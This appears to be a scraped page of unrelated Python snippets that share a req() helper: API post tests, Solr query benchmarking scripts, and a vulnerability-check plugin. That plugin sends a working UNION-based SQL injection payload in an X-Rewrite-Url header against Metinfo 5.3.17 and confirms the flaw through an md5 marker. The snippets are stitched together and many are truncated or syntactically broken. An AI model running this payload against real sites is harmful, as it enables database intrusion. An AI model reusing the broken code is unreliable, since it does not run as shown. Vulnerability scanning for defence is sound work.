Exemple #1
def test_users_post():
    # post запрос на добавление нового юзера.
    k = req(gbl.users_url)
    le = k.json_lenght() + 1
    payload = {
        "name": "Glenna Reichert",
        "username": "******",
        "email": "*****@*****.**",
        "address": {
            "street": "Dayna Park",
            "suite": "Suite 449",
            "city": "Bartholomebury",
            "zipcode": "76495-3109",
            "geo": {
                "lat": "24.6463",
                "lng": "-168.8889"
        "phone": "(775)976-6794 x41206",
        "website": "conrad.com",
        "company": {
            "name": "Yost and Sons",
            "catchPhrase": "Switchable contextually-based project",
            "bs": "aggregate real-time technologies"
    q = request(gbl.users_url, gbl.schema_users_post(le), payload)
def test_albums_post(param_users):
    # post запрос на добавление нового альбома, проверяем при разных userId
    k = req(gbl.albums_url)
    le = k.json_lenght() + 1
    payload = {"title": "post_19:55", "userId": param_users}
    q = request(gbl.albums_url, gbl.schema_albums_post(param_users, le),
Exemple #3
def test_comments_post(param_posts):
    # post запрос на добавление нового поста, проверяем при разных userId
    k = req(gbl.comments_url)
    le = k.json_lenght()+1
    payload = {"name":"comm_19:55","body":"this is simple new post by me",
    q = request(gbl.comments_url,gbl.schema_comments_post(param_posts,le),
def test_todos_post(param_users):
    # post запрос на добавление нового задания, проверяем при разных userId
    k = req(gbl.todos_url)
    le = k.json_lenght() + 1
    payload = {
        "title": "post_19:55",
        "completed": False,
        "userId": param_users
    q = request(gbl.todos_url, gbl.schema_todos_post(param_users, le), payload)
def test_posts_post(param_users):
    # post запрос на добавление нового поста, проверяем при разных userId
    k = req(gbl.posts_url)
    le = k.json_lenght() + 1
    payload = {
        "title": "post_19:55",
        "body": "this is simple new post by me",
        "userId": param_users
    q = request(gbl.posts_url, gbl.schema_posts_post(param_users, le), payload)
def test_photos_post(param_albums):
    # post запрос на добавление нового фото, проверяем при разных albumId
    k = req(gbl.photos_url)
    le = k.json_lenght() + 1
    payload = {
        "title": "post_19:55",
        "url": "https://azcxards.net/3/1",
        "thumbnailUrl": "https://azcxards.net/3/1",
        "albumId": param_albums
    q = request(gbl.photos_url, gbl.schema_photos_post(param_albums, le),
def run(solr_url, query, haystack,
        min=0.0, max=2.0, increment=0.25,
    min = float(min)
    max = float(max)
    increment = float(increment)
    max_hits = int(max_hits)
    if (os.path.exists(query)):
        queries = load_queries(query)
        queries = [query]
    if (os.path.exists(haystack)):
        haystack = load_queries(haystack)
        haystack = [haystack]    
    haystack = [x.split(':', 1) for x in haystack]
    fl = ','.join(list(set([x[0] for x in haystack])))
    combinations = generate_combinations(qf, min, max, increment)
    results = {'variations': combinations}
    i = 0
    for qf in combinations:
        i = i + 1
        log.info("Starting combination: %s %d/%d" % (qf, i, len(combinations)))
        for q in queries:
            log.info("%s" % q)
            rsp = req(solr_url, q=q, qf=qf, fl=fl, rows=max_hits)
            collect_data(q, qf, results, rsp, haystack)
    def custom_handler(obj):
        if isinstance(obj, DataPoint):
            return obj.jsonize()
        return obj
    out = {}
    out['results'] = results
    out['simplified'] = output_positions(results)
    out['params'] = dict(max=max, min=min, increment=increment, solr=solr_url, query=query,
                         maxhits=max_hits, generated=datetime.date.today().isoformat())
    print simplejson.dumps(out, default=custom_handler)       
def select_representative_record(rsp, solr_url, j, query_name):
    if not rsp['response'].has_key('docs'):
        return None
    tmp_results = []
    for doc in rsp['response']['docs']:
        q = "bibcode:%s" % doc['bibcode']
        cit_rsp = req(solr_url, q=("%s(%s)" % (query_name, q)), fl="citation_count", rows=0)
        if (not cit_rsp['responseHeader'].has_key('status') or cit_rsp['responseHeader']['status'] != 0):
            log.error("Error searching: %s" % str(rsp))
        numfound = cit_rsp['response']['numFound']
        qtime = cit_rsp['responseHeader']['QTime']
        tmp_results.append((q, numfound, qtime))
        if numfound == j:
    if len(tmp_results):
        return sorted(tmp_results, key=lambda x: abs((x[1] % j)))[0]
    def verify(self, first=False):
        # 漏洞验证方法(mode=verify)
        target = self.scan_info.get("Target", "")    # 获取测试目标
        verbose = self.scan_info.get("Verbose", False)   # 是否打印详细信息

        # 以下是PoC的检测逻辑
        url = urljoin(target,'index.php?lang=Cn&index=1')
        payload = "1/2/zxxza' union select 1,2,3,md5(0x11),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#/index.php"
        headers = {
            "X-Rewrite-Url": payload

        location = ""
        # 使用req做HTTP请求的发送和响应的处理,req是TCC框架将requests的HTTP请求方法封装成统一的req函数,使用req(url, method, **kwargs),参数传递同requests
        resp = req(url, 'get', headers=headers, allow_redirects=False)
        if resp is not None:
            location = resp.headers.get("Location", "")

        if "47ed733b8d10be225eceba344d533586" in location:
            self.scan_info['Success'] = True    # 漏洞存在,必须将该字段更新为True(必须)
            self.scan_info['Ret']['VerifyInfo']['URL'] = url    # 记录漏洞相关的一些额外信息(可选)
            self.scan_info['Ret']['VerifyInfo']['DATA'] = "X-Rewrite-Url:" + payload
            if verbose:
                highlight('[*] Metinfo 5.3.17 X-Rewrite-url SQL Injection found')    # 打印高亮信息发现漏洞,其他可用方法包括info()/warn()/error()/highlight()方法分别打印不同等级的信息
def run(solr_url,
        min=0, max=4000000, increment=9,
        max_hits=10, max_qtime=60000
    results = []
    # first start with simple queries
    i = 0
    j = None
    empty = 0
    while False:
        i = i + 1
        j = i + increment
        q = "citation_count:[%s TO %s]" % (i,j)
        log.info("%s" % q)
        rsp = req(solr_url, q=q, fl=fl, rows=max_hits, sort="citation_count desc")
        r = select_representative_record(rsp, solr_url, j, query_name)
        if r != None:
            empty = 0
            empty = empty + 1
        if empty > 3:
        if j >= max:
        i = j
    start_id = max
    end_id = start_id
    incr = 100
    cycle = 1
    while True:
        end_id = end_id + (cycle * (incr * increment))
        q = "id:[%s TO %s]" % (start_id, end_id)
        log.info("%s" % q)
        # first issue the query without citations
        rsp = req(solr_url, q=q, fl=fl, rows=1)
        # now execute the functional query
        rsp = req(solr_url, q=("%s(%s)" % (query_name, q)), fl=fl, rows=1)
        if (not rsp['responseHeader'].has_key('status') or rsp['responseHeader']['status'] != 0):
            log.error("Error searching: %s" % str(rsp))
        numfound = rsp['response']['numFound']
        qtime = rsp['responseHeader']['QTime']
        results.append((q, numfound, qtime))
        if numfound > max or qtime > max_qtime:
            log.info("Stopping because qtime too high: %s" % (qtime,))
        log.info("last found: q=%s, num=%s, qtime=%s" % (q, numfound, qtime))
        cycle += 1
    today = datetime.date.today()
    previous = today
    resolution = 30
    stop_day = datetime.date.fromordinal(today.toordinal()-(365*2))
    while False:
        q = "pubdate:[%s TO %s]" % (str(previous),str(today))
        log.info("%s" % q)
        # now execute the functional query
        rsp = req(solr_url, q=("%s(%s)" % (query_name, q)), fl=fl, rows=1)
        if (not rsp['responseHeader'].has_key('status') or rsp['responseHeader']['status'] != 0):
            log.error("Error searching: %s" % str(rsp))
        numfound = rsp['response']['numFound']
        qtime = rsp['responseHeader']['QTime']
        results.append((q, numfound, qtime))
        previous = previous.fromordinal(previous.toordinal() - resolution)
        if previous < stop_day:
    print "#%s" % (query_name,)
    print "query\tnumFound\tQTime"
    print "\n".join(map(lambda x: "%s\t%s\t%s" % x, results))